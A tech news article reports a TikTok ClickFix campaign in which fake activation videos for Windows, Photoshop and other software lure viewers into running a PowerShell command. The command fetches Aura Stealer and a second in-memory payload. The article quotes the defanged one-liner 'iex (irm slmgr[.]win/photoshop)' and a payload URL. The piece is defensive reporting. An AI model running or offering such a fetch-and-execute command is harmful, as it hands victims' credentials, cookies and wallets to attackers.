Tekmono
  • News
  • Guides
  • Lists
  • Reviews
  • Deals
No Result
View All Result
Tekmono
No Result
View All Result
Home News
TikTok Campaign Spreads Malware via Fake Software Activators

TikTok Campaign Spreads Malware via Fake Software Activators

by Tekmono Editorial Team
21/10/2025
in News
Share on FacebookShare on Twitter

Cybercriminals are using TikTok to distribute information-stealing malware through a campaign that tricks users into infecting their computers with malicious software by disguising it as free activation guides for popular software.

ISC Handler Xavier Mertens identified the ongoing operation on October 19, 2025, which uses social engineering tactics to deceive users. The campaign bears similarities to an operation observed by Trend Micro in May, where TikTok videos falsely claimed to offer instructions for activating legitimate software such as Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, and Discord Nitro, as well as fabricated services like “Netflix Premium” and “Spotify Premium.”

The attack technique employed is known as a ClickFix attack, which involves providing seemingly helpful instructions that deceive users into running malicious commands. The videos display a short, one-line PowerShell command and instruct viewers to execute it with administrator privileges. An example command shown is iex (irm slmgr[.]win/photoshop). The specific program name within the URL is altered to match the software being impersonated in the video.

Related Reads

Google opens applications for Gemini App Trusted Tester program

Claude Voice Mode upgrade adds multilingual support and new Push-to-talk feature

Pentagon confirms use of Elon Musk’s Grok AI in missile strikes on Iran

SpaceX acquires AI coding startup Cursor for $60 billion in strategic move

When a user executes this command, PowerShell connects to the remote site slmgr[.]win, retrieving and running a second PowerShell script. This script then downloads two executable files from Cloudflare pages. The first file, downloaded from https://file-epq[.]pages[.]dev/updater.exe, is a variant of the Aura Stealer malware designed to harvest saved credentials from web browsers, authentication cookies, cryptocurrency wallets, and login data from other applications. The stolen information is then uploaded to the attackers, granting them access to the victim’s accounts.

A second payload, named source.exe, is also downloaded and used to self-compile code using the .NET framework’s built-in Visual C# Compiler (csc.exe). The compiled code is subsequently injected and launched directly in memory. However, the specific purpose of this second payload has not yet been determined.

Users who have followed the instructions in these videos are advised to consider all of their credentials compromised and immediately reset passwords for all websites and online services they use. ClickFix attacks have become significantly more common over the past year, used to distribute various malware strains in campaigns related to ransomware and cryptocurrency theft.

As a general security practice, users should never copy text from a website and execute it in an operating system dialog box, including the File Explorer address bar, command prompt, PowerShell, macOS terminal, or Linux shells.

ShareTweet

You Might Be Interested

Google opens applications for Gemini App Trusted Tester program
News

Google opens applications for Gemini App Trusted Tester program

17/06/2026
Claude Voice Mode upgrade adds multilingual support and new Push-to-talk feature
News

Claude Voice Mode upgrade adds multilingual support and new Push-to-talk feature

17/06/2026
Pentagon confirms use of Elon Musk’s Grok AI in missile strikes on Iran
News

Pentagon confirms use of Elon Musk’s Grok AI in missile strikes on Iran

17/06/2026
SpaceX acquires AI coding startup Cursor for  billion in strategic move
News

SpaceX acquires AI coding startup Cursor for $60 billion in strategic move

17/06/2026
Please login to join discussion

Recent Posts

  • Google opens applications for Gemini App Trusted Tester program
  • Claude Voice Mode upgrade adds multilingual support and new Push-to-talk feature
  • Pentagon confirms use of Elon Musk’s Grok AI in missile strikes on Iran
  • SpaceX acquires AI coding startup Cursor for $60 billion in strategic move
  • Qualcomm unveils Snapdragon Reality Elite as next-gen XR platform

Recent Comments

No comments to show.
  • News
  • Guides
  • Lists
  • Reviews
  • Deals
Tekmono is a Linkmedya brand. © 2015.

No Result
View All Result
  • News
  • Guides
  • Lists
  • Reviews
  • Deals

This website uses cookies to improve your experience. You can choose to accept or reject them. Visit our Privacy Policy.